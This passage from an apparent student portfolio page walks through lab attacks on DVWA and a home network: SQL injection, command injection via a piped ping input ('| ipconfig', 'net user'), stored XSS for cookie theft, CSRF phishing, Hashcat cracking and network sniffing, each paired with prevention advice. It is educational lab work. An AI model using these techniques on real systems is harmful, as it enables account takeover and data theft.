          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
           <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
          the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
          <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
           <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
